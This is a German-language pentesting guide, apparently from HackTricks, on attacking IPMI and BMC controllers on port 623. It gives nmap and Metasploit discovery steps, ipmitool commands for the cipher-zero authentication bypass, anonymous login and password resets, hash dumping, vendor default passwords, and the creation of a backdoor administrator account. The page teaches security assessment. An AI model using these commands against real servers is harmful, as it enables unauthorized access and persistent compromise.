# 623/UDP/TCP - IPMI

## 623/UDP/TCP - IPMI

{{#include ../banners/hacktricks-training.md}}


## Grundinformationen

### **Überblick über IPMI**

**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** bietet einen standardisierten Ansatz für das Remote-Management und die Überwachung von Computersystemen, unabhängig vom Betriebssystem oder dem Stromzustand. Diese Technologie ermöglicht es Systemadministratoren, Systeme aus der Ferne zu verwalten, selbst wenn sie ausgeschaltet oder nicht ansprechbar sind, und ist besonders nützlich für:

- Pre-OS-Boot-Konfigurationen
- Management des Stromausfalls
- Wiederherstellung von Systemfehlern

IPMI ist in der Lage, Temperaturen, Spannungen, Lüftergeschwindigkeiten und Stromversorgungen zu überwachen, sowie Inventarinformationen bereitzustellen, Hardwareprotokolle zu überprüfen und Warnungen über SNMP zu senden. Für den Betrieb sind eine Stromquelle und eine LAN-Verbindung erforderlich.

Seit seiner Einführung durch Intel im Jahr 1998 wird IPMI von zahlreichen Anbietern unterstützt, was die Remote-Management-Funktionen verbessert, insbesondere mit der Unterstützung von Version 2.0 für serielle Verbindungen über LAN. Zu den Hauptkomponenten gehören:

- **Baseboard Management Controller (BMC):** Der Hauptmikrocontroller für IPMI-Operationen.
- **Kommunikationsbusse und -schnittstellen:** Für interne und externe Kommunikation, einschließlich ICMB, IPMB und verschiedenen Schnittstellen für lokale und Netzwerkverbindungen.
- **IPMI-Speicher:** Zum Speichern von Protokollen und Daten.

![https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right)

**Standardport**: 623/UDP/TCP (Es läuft normalerweise über UDP, kann aber auch über TCP betrieben werden)

## Aufzählung

### Entdeckung
```bash
nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use  auxiliary/scanner/ipmi/ipmi_version
```
Sie können **die Version** mit folgendem Befehl **identifizieren**:
```bash
use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10
```
### IPMI-Sicherheitsanfälligkeiten

Im Bereich von IPMI 2.0 wurde von Dan Farmer ein bedeutender Sicherheitsfehler entdeckt, der eine Anfälligkeit durch **Cipher-Typ 0** aufdeckte. Diese Anfälligkeit, die detailliert in [Dan Farmers Forschung](http://fish2.com/ipmi/cipherzero.html) dokumentiert ist, ermöglicht unbefugten Zugriff mit jedem Passwort, sofern ein gültiger Benutzer ins Visier genommen wird. Diese Schwäche wurde bei verschiedenen BMCs von Herstellern wie HP, Dell und Supermicro gefunden, was auf ein weit verbreitetes Problem in allen IPMI 2.0-Implementierungen hindeutet.

### **IPMI-Authentifizierungsumgehung über Cipher 0**

Um diesen Fehler zu erkennen, kann der folgende Metasploit-Hilfsscanner verwendet werden:
```bash
use auxiliary/scanner/ipmi/ipmi_cipher_zero
```
Die Ausnutzung dieses Fehlers ist mit `ipmitool` möglich, wie unten gezeigt, was das Auflisten und Ändern von Benutzerpasswörtern ermöglicht:
```bash
apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password
```
### **IPMI 2.0 RAKP-Authentifizierung Remote-Passwort-Hash-Abfrage**

Diese Schwachstelle ermöglicht die Abfrage von gesalzenen Hash-Passwörtern (MD5 und SHA1) für jeden vorhandenen Benutzernamen. Um diese Schwachstelle zu testen, bietet Metasploit ein Modul an:
```bash
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
```
### **IPMI Anonyme Authentifizierung**

Eine Standardkonfiguration in vielen BMCs ermöglicht den "anonymen" Zugriff, gekennzeichnet durch leere Benutzername- und Passwort-Strings. Diese Konfiguration kann ausgenutzt werden, um die Passwörter von benannten Benutzerkonten mit `ipmitool` zurückzusetzen:
```bash
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
```
### **Supermicro IPMI Klartext-Passwörter**

Eine kritische Designentscheidung in IPMI 2.0 erfordert die Speicherung von Klartext-Passwörtern innerhalb von BMCs zu Authentifizierungszwecken. Die Speicherung dieser Passwörter durch Supermicro an Orten wie `/nv/PSBlock` oder `/nv/PSStore` wirft erhebliche Sicherheitsbedenken auf:
```bash
cat /nv/PSBlock
```
### **Supermicro IPMI UPnP Verwundbarkeit**

Die Einbeziehung eines UPnP SSDP-Listeners in die IPMI-Firmware von Supermicro, insbesondere auf UDP-Port 1900, stellt ein erhebliches Sicherheitsrisiko dar. Verwundbarkeiten im Intel SDK für UPnP-Geräte Version 1.3.1, wie von [Rapid7's Disclosure](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play) detailliert, ermöglichen Root-Zugriff auf das BMC:
```bash
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
```
### Brute Force

**HP randomisiert das Standardpasswort** für sein **Integrated Lights Out (iLO)** Produkt während der Herstellung. Diese Praxis steht im Gegensatz zu anderen Herstellern, die dazu neigen, **statische Standardanmeldeinformationen** zu verwenden. Eine Zusammenfassung der Standardbenutzernamen und -passwörter für verschiedene Produkte ist wie folgt:

- **HP Integrated Lights Out (iLO)** verwendet eine **fabrikmäßig randomisierte 8-Zeichen-Zeichenfolge** als Standardpasswort, was ein höheres Sicherheitsniveau zeigt.
- Produkte wie **Dell's iDRAC, IBM's IMM** und **Fujitsu's Integrated Remote Management Controller** verwenden leicht zu erratende Passwörter wie "calvin", "PASSW0RD" (mit einer Null) und "admin".
- Ebenso verwenden **Supermicro IPMI (2.0), Oracle/Sun ILOM** und **ASUS iKVM BMC** ebenfalls einfache Standardanmeldeinformationen, wobei "ADMIN", "changeme" und "admin" als ihre Passwörter dienen.

## Accessing the Host via BMC

Der administrative Zugriff auf den Baseboard Management Controller (BMC) eröffnet verschiedene Wege, um auf das Betriebssystem des Hosts zuzugreifen. Ein einfacher Ansatz besteht darin, die KVM-Funktionalität des BMC auszunutzen. Dies kann entweder durch einen Neustart des Hosts zu einer Root-Shell über GRUB (unter Verwendung von `init=/bin/sh`) oder durch das Booten von einer virtuellen CD-ROM, die als Rettungsdiskette festgelegt ist, erfolgen. Solche Methoden ermöglichen eine direkte Manipulation der Festplatte des Hosts, einschließlich der Einfügung von Backdoors, Datenextraktion oder anderer notwendiger Maßnahmen für eine Sicherheitsbewertung. Dies erfordert jedoch einen Neustart des Hosts, was ein erhebliches Manko darstellt. Ohne Neustart ist der Zugriff auf den laufenden Host komplexer und variiert je nach Konfiguration des Hosts. Wenn die physische oder serielle Konsole des Hosts angemeldet bleibt, kann sie leicht über die KVM- oder Serial-over-LAN (sol) Funktionen des BMC über `ipmitool` übernommen werden. Die Erforschung der Ausnutzung gemeinsamer Hardware-Ressourcen, wie dem i2c-Bus und dem Super I/O-Chip, ist ein Bereich, der weitere Untersuchungen erfordert.

## Introducing Backdoors into BMC from the Host

Nach der Kompromittierung eines Hosts, der mit einem BMC ausgestattet ist, kann die **lokale BMC-Schnittstelle genutzt werden, um ein Backdoor-Benutzerkonto einzufügen**, was eine dauerhafte Präsenz auf dem Server schafft. Dieser Angriff erfordert das Vorhandensein von **`ipmitool`** auf dem kompromittierten Host und die Aktivierung der BMC-Treibersupport. Die folgenden Befehle veranschaulichen, wie ein neues Benutzerkonto in das BMC über die lokale Schnittstelle des Hosts injiziert werden kann, was die Notwendigkeit einer Authentifizierung umgeht. Diese Technik ist auf eine Vielzahl von Betriebssystemen anwendbar, einschließlich Linux, Windows, BSD und sogar DOS.
```bash
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)
4  backdoor        true    false      true      ADMINISTRATOR
```
## Shodan

- `port:623`

## References

- [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)


{{#include ../banners/hacktricks-training.md}}